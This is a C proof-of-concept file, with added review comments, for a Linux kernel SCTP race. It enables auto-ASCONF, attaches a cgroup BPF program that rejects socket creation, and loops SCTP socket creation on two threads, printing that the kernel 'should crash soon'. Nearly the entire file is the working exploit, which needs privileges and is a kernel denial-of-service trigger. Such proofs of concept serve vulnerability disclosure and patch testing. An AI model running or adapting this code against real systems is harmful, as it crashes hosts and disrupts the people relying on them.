#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <inttypes.h>
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include "bpf_insn.h"
#include <sched.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <arpa/inet.h>
#include <sys/stat.h>
#include <stdbool.h>
#include <stdarg.h>
#include <stdint.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/time.h>
#include <sys/resource.h>

/*
 * SCTP socket-option constants. The values presumably mirror the kernel's
 * <linux/sctp.h> (SOL_SCTP == IPPROTO_SCTP), which this file does not include.
 * NOTE(review): neither macro is referenced in the code visible here.
 */
#define SCTP_AUTO_ASCONF       30
#define SOL_SCTP	132

/*
 * Verifier log buffer handed to bpf_load_program() by prog_load().
 * BPF_LOG_BUF_SIZE is assumed to come from <bpf/bpf.h> (libbpf) — confirm.
 */
char bpf_log_buf[BPF_LOG_BUF_SIZE];

/*
 * Build and load a minimal BPF_PROG_TYPE_CGROUP_SOCK program:
 *
 *	r6 = r1        ; copy of the context pointer (not used afterwards)
 *	r0 = 0         ; verdict returned to the kernel
 *	exit
 *
 * @idx, @mark, @prio: unused; kept so the signature stays unchanged.
 *
 * Returns the program fd from bpf_load_program() on success, or a negative
 * value on failure with errno set (ENOMEM if the instruction buffer could not
 * be allocated), so the caller can report it with perror(). Any verifier
 * output is written to the global bpf_log_buf.
 *
 * NOTE(review): bpf_load_program() is deprecated in newer libbpf releases in
 * favour of bpf_prog_load(); it is kept here to match the libbpf this file
 * was written against.
 */
static int prog_load(__u32 idx, __u32 mark, __u32 prio)
{
	struct bpf_insn prog_start[] = {
		BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
	};
	struct bpf_insn prog_end[] = {
		BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = verdict */
		BPF_EXIT_INSN(),
	};
	const size_t start_cnt = sizeof(prog_start) / sizeof(prog_start[0]);
	const size_t end_cnt = sizeof(prog_end) / sizeof(prog_end[0]);
	const size_t insns_cnt = start_cnt + end_cnt;
	struct bpf_insn *prog;
	int saved_errno;
	int ret;

	(void)idx;
	(void)mark;
	(void)prio;

	prog = calloc(insns_cnt, sizeof(*prog));
	if (!prog) {
		fprintf(stderr, "Failed to allocate memory for instructions\n");
		/* Must be negative: callers treat any fd >= 0 as success. */
		errno = ENOMEM;
		return -1;
	}

	/* Typed pointer arithmetic instead of the GNU-only void* arithmetic. */
	memcpy(prog, prog_start, sizeof(prog_start));
	memcpy(prog + start_cnt, prog_end, sizeof(prog_end));

	ret = bpf_load_program(BPF_PROG_TYPE_CGROUP_SOCK, prog, insns_cnt,
				"GPL", 0, bpf_log_buf, BPF_LOG_BUF_SIZE);

	/* Keep the load error visible to the caller's perror(). */
	saved_errno = errno;
	free(prog);
	errno = saved_errno;

	return ret;
}

/*
 * Repeatedly create SCTP (AF_INET, SOCK_SEQPACKET) sockets, forever.
 *
 * main() runs this both on a spawned thread and on the main thread itself.
 * The cgroup program attached by main() always returns verdict 0, and the
 * message below treats a successful socket() as unexpected. That presumes a
 * 0 verdict rejects socket creation. Any descriptor that is obtained is
 * reported and closed immediately.
 *
 * @arg: unused; present to match the pthread start-routine signature.
 * Never returns.
 */
void * create_sock_thread_function(void *arg)
{
    (void)arg;

    for (;;) {
        int fd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);

        /* 0 is a valid descriptor, so test >= 0 (not > 0) to avoid leaking it. */
        if (fd >= 0) {
            printf("This should not happen!!!!\n");
            close(fd);
        }
    }
    return NULL;
}

/*
 * printf-style helper. It formats the arguments into a 1 KiB stack buffer and
 * writes the result to @file with a single write(2). The file is opened
 * O_WRONLY without O_CREAT, so it must already exist.
 *
 * Returns true only if every formatted byte was written. Returns false if:
 *   - formatting fails, or
 *   - the output would not fit in the buffer (errno = EOVERFLOW), instead of
 *     silently writing a truncated value, or
 *   - open(2) or write(2) fails, or
 *   - the write is short (errno = EIO).
 * On failure errno describes the cause, so callers can use perror().
 */
static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	int n;

	va_start(args, what);
	n = vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);

	if (n < 0)
		return false;
	if ((size_t)n >= sizeof(buf)) {
		errno = EOVERFLOW;
		return false;
	}

	size_t len = (size_t)n;
	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;

	ssize_t written = write(fd, buf, len);
	/* close() may overwrite errno; keep the write(2) result for callers. */
	int saved_errno = errno;
	close(fd);

	if (written < 0) {
		errno = saved_errno;
		return false;
	}
	if ((size_t)written != len) {
		errno = EIO;
		return false;
	}
	return true;
}


/*
 * Write "1" to /proc/sys/net/sctp/default_auto_asconf. This is presumably the
 * auto-ASCONF default applied to newly created SCTP sockets.
 *
 * Returns true on success. On failure it prints the reason via perror() and
 * returns false.
 */
bool set_default_auto_asconf(void)
{
    if (!write_file("/proc/sys/net/sctp/default_auto_asconf", "1")) {
        /* perror() appends ": <strerror(errno)>\n" itself; no '\n' here. */
        perror("Failed to write to default_auto_asconf");
        return false;
    }
    return true;
}


/*
    Required capabilities:

        kernel >= 5.8 -
            CAP_BPF, CAP_NET_ADMIN

        kernel < 5.8 -
            CAP_SYS_ADMIN
    
*/
int main(int argc, char **argv)
{
    printf("sctp race poc - privileged user\n");
    char* cgrp_path;
    if (argv[1])
    {
        cgrp_path = argv[1];
    }
    else
    {
        cgrp_path = "/sys/fs/cgroup/unified";
    }

    int cg_fd = open(cgrp_path, O_DIRECTORY | O_RDONLY);
	if (cg_fd < 0)
	{
		printf("Failed to open cgroup path: '%s'\n", strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Opened cgroup path =  %s\n", cgrp_path);

    if (!set_default_auto_asconf())
    {
        return EXIT_FAILURE;
    }

    printf("Successfuly enabled /proc/sys/net/sctp/default_auto_asconf\n");

    int prog_fd = prog_load(0, 0, 0);
    if( prog_fd < 0 )
    {
        perror("prog_load failed\n");
        return 1;
    }

    printf("Successfuly loaded a BPF_PROG_TYPE_CGROUP_SOCK program\n");

    int ret = bpf_prog_attach(prog_fd, cg_fd,
				      BPF_CGROUP_INET_SOCK_CREATE, 0);
	if (ret < 0)
    {
		printf("Failed to attach prog to cgroup: '%s'\n",
			    strerror(errno));
		return EXIT_FAILURE;
	}
    printf("Successfuly attached the program to BPF_CGROUP_INET_SOCK_CREATE\n");

    sleep(1);

    pthread_t create_sock_thread;
    if (pthread_create(&create_sock_thread,
                       NULL,
                       create_sock_thread_function,
                       NULL))
    {
        printf("pthread_create failed with error =  '%s'\n",
			    strerror(errno));
        return EXIT_FAILURE;
    }

    printf("Kernel should crash soon.. (if CONFIG_DEBUG_LIST is enabled)\n");
    create_sock_thread_function(NULL);
    return 0;
}
